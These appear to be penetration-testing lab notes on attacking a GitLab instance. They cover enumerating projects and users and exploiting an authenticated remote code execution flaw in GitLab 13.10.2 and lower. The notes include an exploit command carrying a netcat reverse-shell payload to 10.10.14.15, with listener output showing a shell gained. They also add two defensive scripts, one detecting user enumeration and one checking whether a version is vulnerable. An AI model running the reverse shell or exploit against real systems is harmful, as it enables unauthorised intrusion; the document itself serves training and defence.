GitLab

Footprinting & Discovery

http://gitlab.inlanefreight.local:8081/users/sign_in

The only way to footprint the GitLab version number in use is to browse to the /help page while logged in; the version is not exposed to unauthenticated visitors.

Enumeration

Browse to /explore and see if there are any public projects that may contain something interesting.

Check whether self-registration is enabled; a freshly registered account may be able to access additional (internal) projects that are hidden from anonymous visitors.

User Enumeration

http://gitlab.inlanefreight.local:8081/users/sign_up

GitLab's default lockout policy locks an account after 10 failed sign-in attempts and unlocks it automatically after 10 minutes.

./gitlab_userenum.sh --url http://gitlab.inlanefreight.local:8081/ --userlist users.txt
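The lockout default above is per account, so a source that tries one password against many usernames never trips it. The following detection logic is an added example (not part of the original notes or the gitlab_userenum.sh tool): it reads failed sign-in events and flags any source address that fails against several distinct usernames inside the 10-minute window. The log lines and their JSON layout are constructed for the demo and do not reproduce GitLab's real log format; the window and threshold are assumptions to tune per environment.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not GitLab's actual log format): one event per
# line, JSON encoded. 10.10.14.15 fails once against six different accounts;
# 192.168.1.20 is a user mistyping their own password twice.
SAMPLE_LOG = """\
{"ts": "2024-01-10T09:00:01Z", "event": "login_failed", "user": "alice", "ip": "10.10.14.15"}
{"ts": "2024-01-10T09:00:02Z", "event": "login_failed", "user": "bob", "ip": "10.10.14.15"}
{"ts": "2024-01-10T09:00:03Z", "event": "login_failed", "user": "carol", "ip": "10.10.14.15"}
{"ts": "2024-01-10T09:00:04Z", "event": "login_failed", "user": "dave", "ip": "10.10.14.15"}
{"ts": "2024-01-10T09:00:05Z", "event": "login_failed", "user": "erin", "ip": "10.10.14.15"}
{"ts": "2024-01-10T09:00:06Z", "event": "login_failed", "user": "frank", "ip": "10.10.14.15"}
{"ts": "2024-01-10T09:05:00Z", "event": "login_failed", "user": "alice", "ip": "192.168.1.20"}
{"ts": "2024-01-10T09:05:30Z", "event": "login_failed", "user": "alice", "ip": "192.168.1.20"}
{"ts": "2024-01-10T09:06:00Z", "event": "login_success", "user": "alice", "ip": "192.168.1.20"}
"""

# Assumed tuning values: the 10-minute window mirrors GitLab's default unlock
# period; five distinct usernames from one source is the alert threshold.
WINDOW = timedelta(minutes=10)
DISTINCT_USER_THRESHOLD = 5


def parse_events(text):
    """Parse JSON-lines events, converting the timestamp to a datetime."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(rec)
    return events


def detect_enumeration(events, window=WINDOW, threshold=DISTINCT_USER_THRESHOLD):
    """Return {ip: sorted usernames} for every source that failed sign-in
    against at least `threshold` distinct usernames within any span of
    length `window`. The per-account lockout never fires in this pattern
    (one failure per account), so detection keys on the source address."""
    failed = defaultdict(list)
    for e in events:
        if e["event"] == "login_failed":
            failed[e["ip"]].append((e["ts"], e["user"]))

    alerts = {}
    for ip, attempts in failed.items():
        attempts.sort()  # chronological, so the sliding window below is valid
        for i, (start, _) in enumerate(attempts):
            users = {u for ts, u in attempts[i:] if ts - start <= window}
            if len(users) >= threshold:
                alerts[ip] = sorted(users)
                break
    return alerts


if __name__ == "__main__":
    for ip, users in detect_enumeration(parse_events(SAMPLE_LOG)).items():
        print(f"possible user enumeration from {ip}: "
              f"{len(users)} usernames tried ({', '.join(users)})")
```

Run against the sample, only 10.10.14.15 is reported; the legitimate user on 192.168.1.20 stays below the threshold because every failure is against the same account. A per-source rate limit or a spread of failures across accounts is the signal the default per-account lockout does not give you.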

Authenticated Remote Code Execution

GitLab Community Edition version 13.10.2 and lower suffered from an authenticated remote code execution vulnerability.

If we encounter a vulnerable version of GitLab that allows for self-registration, we can quickly sign up for an account and pull off the attack. Otherwise, credentials have to come from OSINT or password guessing.

python3 gitlab_13_10_2_rce.py -t http://gitlab.inlanefreight.local:8081 -u mrb3n -p password1 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.15 8443 >/tmp/f '

[1] Authenticating
Successfully Authenticated
[2] Creating Payload 
[3] Creating Snippet and Uploading
[+] RCE Triggered !!
nc -lnvp 8443

listening on [any] 8443 ...
connect to [10.10.14.15] from (UNKNOWN) [10.129.201.88] 60054

git@app04:~/gitlab-workhorse$ id

id
uid=996(git) gid=997(git) groups=997(git)
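Because the affected range is defined purely by version, the defender's check is a patch-level comparison against the version string shown on /help. The script below is an added example, not one of the scripts referenced in these notes: it parses the "GitLab Community Edition X.Y.Z" banner and reports whether the instance falls in the 13.10.2-and-lower range. The banner wording, the `_gitlab_session` cookie name, and the first-fixed version 13.10.3 (derived from the range stated above) are assumptions to confirm against the vendor advisory; the HTML fragment is constructed for the offline demo.

```python
import re
import urllib.request  # used only by fetch_help_version(), not by the offline demo

# Assumed: the note above says 13.10.2 and lower are affected, so 13.10.3 is
# treated as the first unaffected release. Verify against the vendor advisory.
FIRST_FIXED = (13, 10, 3)

# Assumed banner wording as rendered on the authenticated /help page.
VERSION_RE = re.compile(
    r"GitLab (?:Community|Enterprise) Edition\s+(\d+)\.(\d+)\.(\d+)"
)

# Constructed /help fragment for the offline demo (not captured from a real host).
SAMPLE_HELP_HTML = """
<div class="help-page">
  <h1>GitLab Community Edition 13.10.2</h1>
  <p>Documentation and help resources.</p>
</div>
"""


def parse_version(text):
    """Extract (major, minor, patch) from the /help banner, or None if absent."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    return tuple(int(x) for x in m.groups())


def is_affected(version, first_fixed=FIRST_FIXED):
    """True when the parsed version is older than the first fixed release.
    Tuple comparison handles multi-digit components correctly (13.9.9 < 13.10.0)."""
    return version < first_fixed


def fetch_help_version(base_url, session_cookie):
    """Fetch /help with an existing authenticated session and parse the banner.
    Assumes GitLab's session cookie is named `_gitlab_session`."""
    req = urllib.request.Request(
        base_url.rstrip("/") + "/help",
        headers={"Cookie": f"_gitlab_session={session_cookie}"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return parse_version(resp.read().decode("utf-8", errors="replace"))


def assess(html):
    """Return a short verdict string for an inventory or patch-compliance report."""
    version = parse_version(html)
    if version is None:
        return "version banner not found (are you logged in?)"
    tag = "AFFECTED - upgrade required" if is_affected(version) else "not affected"
    return f"GitLab {'.'.join(map(str, version))}: {tag}"


if __name__ == "__main__":
    print(assess(SAMPLE_HELP_HTML))
```

For live use, call `fetch_help_version(url, cookie)` with a session obtained by logging in normally; the offline demo only exercises the parser and the comparison so the logic can be checked without a target.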
